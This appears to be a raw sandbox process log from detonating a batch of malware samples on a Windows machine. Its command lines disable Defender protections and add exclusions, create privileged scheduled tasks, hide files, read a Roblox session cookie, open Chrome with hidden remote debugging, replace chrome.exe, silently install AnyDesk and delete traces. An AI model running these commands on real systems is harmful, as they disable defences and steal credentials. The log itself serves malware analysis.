"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5477233236301179200,12933220128853594848,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3088 /prefetch:1

C:\Users\Admin\Desktop\Files\random.exe

"C:\Users\Admin\Desktop\Files\random.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qwex.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\XW.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe"

C:\Users\Admin\Desktop\Files\yiklfON.exe

"C:\Users\Admin\Desktop\Files\yiklfON.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe'

C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 /prefetch:2

C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe'

C:\Windows\SysWOW64\msiexec.exe

msiexec /i vcredist.msi

C:\Users\Admin\Desktop\Files\W4KLQf7.exe

"C:\Users\Admin\Desktop\Files\W4KLQf7.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3560 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7804 -ip 7804

C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp" /SL5="$604C2,1888137,52736,C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\test30.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test30.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2260 -ip 2260

C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe

"C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5792 -ip 5792

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 816

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\wmfdist.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\wmfdist.exe"

C:\Windows\SYSTEM32\msiexec.exe

msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall

C:\Users\Admin\Desktop\Files\steal_stub.exe

"C:\Users\Admin\Desktop\Files\steal_stub.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe"

C:\Users\Admin\Desktop\Files\yiklfON.exe

"C:\Users\Admin\Desktop\Files\yiklfON.exe"

C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe

"C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe"

C:\Users\Admin\Desktop\Files\steal_stub.exe

"C:\Users\Admin\Desktop\Files\steal_stub.exe"

C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe

"C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe"

C:\Users\Admin\Desktop\Files\seksiak.exe

"C:\Users\Admin\Desktop\Files\seksiak.exe"

C:\Users\Admin\Desktop\Files\file.exe

"C:\Users\Admin\Desktop\Files\file.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Oi8sKAHNLo7W.bat" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Itaxyhi.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Itaxyhi.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9586.tmp\9587.tmp\9588.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2368,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:2

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1896,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:3

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1996,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2580 /prefetch:8

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6100 -ip 6100

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6100 -s 1132

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2472,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7480 -ip 7480

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 1072

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost'

C:\Users\Admin\Desktop\Files\seksiak.exe

"C:\Users\Admin\Desktop\Files\seksiak.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3568,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2384,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4824,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nfdKjErmBbK1.bat" "

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E0D7.tmp\E0D8.tmp\E0D9.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe""

C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AdvancedRun.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AdvancedRun.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\5dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\5dismhost.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2504,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\Desktop\New Text Document mod.exse\a\4dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4dismhost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Users\Admin\AppData\Roaming\AnyDesk.exe

C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

